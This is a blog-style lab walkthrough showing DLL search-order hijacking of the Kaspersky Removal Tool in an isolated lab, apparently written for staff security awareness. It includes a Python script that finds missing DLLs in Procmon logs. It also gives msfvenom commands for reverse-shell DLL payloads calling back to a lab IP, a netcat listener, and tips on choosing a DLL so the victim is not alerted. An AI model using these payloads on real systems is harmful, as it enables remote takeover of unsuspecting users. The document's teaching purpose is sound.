Summary

This was a fun demonstration that I used during one of the Lunch and Learn sessions at my company. As a Security Administrator, I always get asked about downloading random software from sometimes not-so-reputable locations. One day I decided to spin up a quick lab environment and demonstrate what happens when you download and run questionable software. It’s always funny to see how non-security folks react once we gain remote access through the magical command line interface.

DLL Injection Overview
Below is a quick reference of the DLL search order. I’m sorry, but I don’t remember where I got these from; maybe Pentest Academy/SecurityTube.

DLL Search Order

With SafeDllSearchMode enabled, Windows looks for a DLL that is not already loaded and not a KnownDLL in this order: the directory the application was loaded from, the system directory (System32), the 16-bit system directory, the Windows directory, the current directory, and finally the directories on PATH. Because the application’s own directory is searched first, a DLL name the program asks for but does not ship with can be satisfied by a file placed next to the executable.

Lab Setup Overview
The vulnerable program that we’re going to use is Kaspersky Removal Tool. This is a program that aids with the removal of the Kaspersky antivirus software.
http://support.kaspersky.com/downloads/utils/kavremover.exe

We’ll also use two virtual machines:
Windows 10 - We’ll predominantly use this for finding the missing dll, and it will also be our “victim” machine once we’re ready to run the questionable software.
Kali - This will be used to generate the reverse shell and to catch it once the software is run from the “victim” machine.

Finding the missing dll
Let’s open Procmon as administrator, apply the filters shown below, then select OK.

We should now have a clean page.

Next, let’s run the installer to see if we can locate some missing dll files that we can potentially use in the exploit.

The trick is to find a dll that doesn’t crash the program. We want the program to run as it normally does without anyone knowing any difference.

With this in mind, we can play around and see which one works better than another, but the best that I could do was this one, “kavremoverENU.dll”.
It doesn’t necessarily crash the program with a Windows crash prompt, but it doesn’t fully run either. This is where playing around with the various steps within the program makes all the difference.
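The Procmon step above can also be done programmatically, which is handy when auditing software for hijackable DLL names. The following script is an added example, not code from the original write-up: it reads a Procmon CSV export and lists every DLL the process probed in its own directory without finding it, separating names it later loaded from elsewhere (such as System32) from names it never found at all. The CSV rows, process names, PIDs and paths are constructed sample data.

```python
import csv
import io
import ntpath

# Constructed sample of a Procmon CSV export (File > Save..., CSV format) with the
# default columns. Process names, PIDs and paths are made up for this example;
# the two DLL names mirror the ones discussed in the write-up.
SAMPLE_PROCMON_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"1:02:03.1 PM","kavremover.exe","4120","CreateFile","C:\Windows\System32\ntdll.dll","SUCCESS","Desired Access: Read Data/List Directory"
"1:02:03.2 PM","kavremover.exe","4120","CreateFile","C:\Users\lab\Downloads\kavremoverENU.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"1:02:03.3 PM","kavremover.exe","4120","CreateFile","C:\Users\lab\Downloads\settings.ini","NAME NOT FOUND","Desired Access: Generic Read"
"1:02:03.4 PM","explorer.exe","1234","CreateFile","C:\Users\lab\Downloads\ieframe.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"1:02:05.0 PM","kavremover.exe","4120","CreateFile","C:\Users\lab\Downloads\msi.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"1:02:05.1 PM","kavremover.exe","4120","CreateFile","C:\Windows\System32\msi.dll","SUCCESS","Desired Access: Read Data/List Directory"
'''


def find_dll_hijack_candidates(csv_text, process_name, app_dir):
    """Return {dll_name: {"probes": [(path, result), ...], "resolved_to": path_or_None}}
    for each DLL that process_name probed in app_dir and did not find there.
    A DLL later loaded from another directory would still be shadowed by a
    copy in app_dir, because the application directory is searched first."""
    app_prefix = ntpath.normcase(app_dir.rstrip("\\")) + "\\"
    seen = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Process Name"].lower() != process_name.lower() or row["Operation"] != "CreateFile":
            continue
        path = row["Path"]
        name = ntpath.basename(path).lower()
        if not name.endswith(".dll"):
            continue
        entry = seen.setdefault(name, {"probes": [], "resolved_to": None, "missing_in_app_dir": False})
        entry["probes"].append((path, row["Result"]))
        if row["Result"] == "NAME NOT FOUND" and ntpath.normcase(path).startswith(app_prefix):
            entry["missing_in_app_dir"] = True
        elif row["Result"] == "SUCCESS" and entry["resolved_to"] is None:
            entry["resolved_to"] = path
    return {name: e for name, e in seen.items() if e["missing_in_app_dir"]}


def describe(candidates):
    """One line per candidate, stating whether the program ever found the DLL."""
    lines = []
    for name, entry in sorted(candidates.items()):
        if entry["resolved_to"] is None:
            lines.append(f"{name}: never found anywhere (the program runs without it)")
        else:
            lines.append(f"{name}: later loaded from {entry['resolved_to']}; a copy in the app directory takes precedence")
    return lines


if __name__ == "__main__":
    found = find_dll_hijack_candidates(SAMPLE_PROCMON_CSV, "kavremover.exe", r"C:\Users\lab\Downloads")
    print("\n".join(describe(found)))
```

Names that are never found are the ones worth reporting to the vendor or locking down, since the program gives no visible sign when a file with that name appears beside it.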

First, let’s create a reverse shell dll payload on the Kali machine, then transfer it back to the Windows box.

This is the reverse shell syntax:

msfvenom -p windows/shell_reverse_tcp LHOST=172.16.101.198 LPORT=443 EXITFUNC=thread -f dll -e x86/shikata_ga_nai -o kavremoverENU.dll

Later we’ll demonstrate using the one below:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.101.198 LPORT=443 -f dll -o msi.dll

We’ll now copy the malicious dll into the same directory where the installer resides.

Close the installer, then clear Procmon so we can see the processes as they launch.

On the Kali machine, let’s open a netcat session on port 443.

nc -lvnp 443

Let’s now start the installer to see if we can catch a shell.

Looks like we’re in business. We now have a reverse shell!

Going back to Procmon, we can see that a rundll32.exe process was immediately launched, which is used for the reverse shell.

We can always go back through the program’s steps to find another dll that lets it move along further, so that we don’t tip off the end user. Another useful dll is “msi.dll”. This one shows up after we select Accept on the EULA. Using this one instead will bring you to the next step of the program, see below.

Using “msi.dll” will launch a reverse shell at this step. I suggest playing around to see what works best for your needs.

Conclusion

There are many ways to exploit programs, but I find dll injection to be one of the quicker methods, especially if a program is already installed.

I hope that you found this writeup informative and maybe you can also demo this during a Lunch and Learn or whenever you’re asked to present something to the company. Until next time, take care.